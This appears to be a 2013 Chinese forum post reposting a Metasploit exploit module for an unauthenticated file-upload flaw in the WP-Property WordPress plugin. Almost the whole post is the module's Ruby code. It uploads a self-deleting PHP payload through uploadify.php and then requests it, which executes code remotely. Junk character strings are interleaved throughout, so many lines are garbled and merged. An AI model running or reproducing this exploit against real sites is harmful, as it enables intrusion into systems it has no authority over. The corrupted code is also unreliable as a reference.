WordPress WP-Property PHP 文件上传漏洞
9 f5 i7 q2 L2 u1 k5 n" l7 t5 [ Q, J# p( q3 ?. v1 h
## # This file is part of the Metasploit Framework and may be subject to ]9 Y K: k5 t8 e8 h
# L R) {/ _5 R' |& e3 x# H
# redistribution and commercial restrictions. Please see the Metasploit
3 Z4 _9 x# M6 F( |, l" o0 ~
: N- t) T% J" m j2 ?$ a4 A. R# Framework web site for more information on licensing and terms of use.
% P& X/ `* W$ j; |( j- h3 D6 h9 W( O' o' }
# http://metasploit.com/framework/ ##- k' K& B- g# t6 t( y s
! P( D4 B* s, ]4 w! ] ( c4 L, j: p& [8 u0 _
+ \ j* k% u6 w: w/ Y& V$ U
+ s3 e) \" ~! o V- S3 ^; `, P$ f3 V; W$ q7 }" A2 C$ z0 O+ i' L
require 'msf/core'
) B7 N" t4 R% R( n% P0 T. ? ]require 'msf/core/exploit/php_exe'8 ?# F: K4 N. N1 Z* _6 [7 B* J
* J3 K+ i6 H* z! R1 w
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
: ^ K) ~0 ~' t, E'Description' => %q{/ q! A2 S" V9 k: |, T% G
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>: S1 X7 ^# J' t& j4 V9 S- ?
[
; h' m2 o8 \) H. t; C* f$ Z6 x! L% ?'Sammy FORGIT', # initial discovery
6 r9 {) n/ u) y* T2 x; i8 Y'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. P, F1 i V9 g4 n# n$ v],. K6 E6 u1 k) i+ ?
'License' => MSF_LICENSE, k7 K% Q8 Z8 h; Q
'References' =>
% ~7 c: J# p* ]6 D& M[/ f9 M+ B0 w z o n
[ 'OSVDB', '82656' ],9 ~* i; t4 h0 g/ ^) ?/ J$ N
[ 'BID', '53787' ],/ d) X8 y$ Q; ^
[ 'EDB', '18987'],7 B( z; m7 K. p. I! K. r
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]4 ?6 G2 }8 D. s& w
],6 s" v8 C8 Z, a M7 U
'Payload' =>" \7 D/ z) f& e0 V3 H
{& x. [% c' J6 N, j4 F. z1 A6 E
'BadChars' => "\x00",2 D7 P5 z5 h' I& O3 R6 `/ n5 `
}," c+ U& _1 V8 |- J# f" u
'Platform' => 'php',
3 S5 x0 o% P! K'Arch' => ARCH_PHP,
% U- N( K9 Q. n$ K B# J8 O'Targets' =>
" j2 d" G9 F% d$ M; \: N$ f* [' X[
: A; }; N/ j1 S T[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
5 P; `2 K+ w- I: [, x! g[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- L, M. d; I; B* s
],
+ O" O0 L6 e; g- ` j h' h# [8 u'DefaultTarget' => 0,
; U2 N: S9 }* s. r" C0 S( X( a# Y: W9 E5 C'DisclosureDate' => 'Mar 26 2012')); j2 G* k7 x4 y9 L
. g7 f- z: U7 P9 Q8 ?
register_options(
& ]( Z9 N0 E; P! [4 `4 L5 r[
~ y8 k' }1 h0 D* YOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. k* l, n/ ^3 C4 a% ?* m0 l], self.class)) ^" l# F$ Y" l+ V" z
end0 @+ M! Z0 z# b2 E
$ }1 e8 Z6 J8 _+ H3 wdef check( @) E$ k2 ^; ]% s4 K
uri = target_uri.path6 t1 r' q0 [4 H' F! ^, [1 v H
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',9 {9 K: m! r: x, U1 \" v x
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"* n) |) s' `3 y& B5 M, L$ ]2 M* P1 o
})
- C2 t8 l/ b' F& i5 I! H5 s
8 V7 m& i$ _2 [6 ?1 b: L. iif not res or res.code != 200
9 N4 n* j3 d- R$ Y+ Ureturn Exploit::CheckCode::Unknown$ Z( z2 M1 e6 x1 j/ ~ a$ \
end
0 T1 n# R- p2 L1 P! r1 y
8 y3 M! \8 R T" t: ^3 ireturn Exploit::CheckCode::Appears
+ F3 o# ]2 U- i% S4 s' wend( F' {/ f/ L$ m/ G8 B9 w6 m5 O
; a$ y: J# P' a2 D9 a2 Rdef exploit$ O3 ]2 f4 I& x
uri = target_uri.path" N- c7 U1 r7 v5 }, W
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
$ k" N7 }+ g' u' D, H) [, Y( }+ V; U# A; _; b* q9 F
data = Rex::MIME::Message.new
" m+ l# j( I; C& P8 Adata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) k' l, X) `( X* ?data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
' w' z5 f+ k/ M o5 tpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'); f. X. d* u" X) t, L* _% v
0 o$ a% F; t* F1 U8 [/ l' xprint_status("#{peer} - Uploading payload #{@payload_name}")3 ]! J4 N- f7 N! X: J3 S! {- g
res = send_request_cgi({
n' ^ C: }) G* n' }9 L'method' => 'POST',
! C$ l+ p0 v; \7 O" E( D$ r! Q: Z3 {'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",7 f& n( V3 e, I9 ?( y9 j
'ctype' => "multipart/form-data; boundary=#{data.bound}",
# [8 [; r5 ~8 K. ]# B'data' => post_data0 ]9 m, ^5 { h1 I" i
})
9 [8 O5 X# c7 I7 X9 }2 K
/ B* |0 N% G7 {* f, u- I7 I/ J0 Fif not res or res.code != 200 or res.body !~ /#{@payload_name}/* ~' y3 c; X8 F/ c6 a
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
q( P0 I( {. M- d; n$ Eend, `; ^6 c- o& q# }8 Z
# K- S3 ^6 a7 \
upload_uri = res.body
% P* e) x; y4 U
, P& C3 v6 l, `+ g/ h0 Lprint_status("#{peer} - Executing payload #{@payload_name}")
" S0 I" ]3 Y' n4 J2 q/ ^res = send_request_raw({+ ^$ f; W' p5 v. _
'uri' => upload_uri,) ]5 d5 [/ l/ Q) G0 V
'method' => 'GET'5 L. T- ^% K, v; ]
})/ Q/ Z$ V$ M: ~: C
end) S# v. J3 g; Z7 i
end
5 r( \" N9 ^! b2 T2 o+ p4 U% ]0 r0 K0 I' E) L7 A4 C+ D5 `$ j# h
不要问我这写的是什么 怎么利用 我是说msf.- O `" z2 S( k1 r6 A0 H
' g. y$ \5 O/ \0 X; v, ^ |
发表于 2013-1-4 19:51:30
收藏
支持
反对